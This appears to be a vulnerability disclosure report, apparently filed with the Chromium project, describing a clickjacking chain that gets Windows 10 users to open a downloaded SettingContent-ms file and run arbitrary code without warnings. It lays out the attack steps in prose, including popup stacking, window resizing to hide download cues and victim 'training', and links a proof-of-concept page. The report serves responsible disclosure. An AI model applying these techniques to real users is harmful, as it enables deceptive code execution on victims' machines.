VULNERABILITY DETAILS
It has come to my attention that files with the extension "SettingContent-ms", when opened on Windows 10, can be made to be executed automatically even when marked by MotW. This led me to revisit an old PoC I constructed on 2015 (https://www.youtube.com/watch?v=cJVk24w0Y1M) and apply a similar vector to this particular case.

Google Safe Browsing also isn't tracking this extension (https://cs.chromium.org/chromium/src/chrome/browser/resources/safe_browsing/download_file_types.asciipb), which can be downloaded without any warnings on Google Chrome.

By combining all the above, I created a clickjacking attack which when successful, executes arbitrary code on the victim's machine (as long as they use Windows 10).

The exploit works as follows:
1. User accesses attacker's website and clicks on a link.
2. A popup will open asking the user to double-click on a button to go to the next image on the gallery.
3. On the first double-click I open another pop up directly above the old one. I then resize the background popup to a very small size (I do this to prevent the "download icon" from signalizing the victim that a download has started). Then, on this same window, I initiate the download of the "testar.SettingContent-ms" file. I also place this pop up directly under the ">>" button.
4. The second double-click is not necessary, it merely serves the purpose of "training" the victim into navigating the gallery only through the use of double-clicks.
5. On the first click of the third double-click I resize the actual window's width to be a bit smaller and display part of the Downloads's shelf (that contains our downloaded file with the payload). And on the second click the victim ends up opening the file, that is executed automatically without any warnings.
6. Using the onblur event I call the confirm dialog to quickly hide the download shelf, making the attack stealthier.

The popups may be be a bit misaligned because I created the PoC only having my screen resolution in mind. If that happens, following every step very slowly will help you understand what the attack is trying to accomplish.

Here is a video simulating the attack:
https://www.youtube.com/watch?v=oQO3xglfwps
 
VERSION
Versão 67.0.3396.79 (Official Build) Stable (64-bits)
Versão 69.0.3453.0  (Official Build) Canary (64-bits)
Only reproducible on Windows 10.

REPRODUCTION CASE
1. Open https://lbherrera.github.io/lab/exec-clickjacking/index.html
2. Click on the link.
3. Keep double-clicking on the button to go to the next image.
4. After a few clicks, calc.exe should pop up.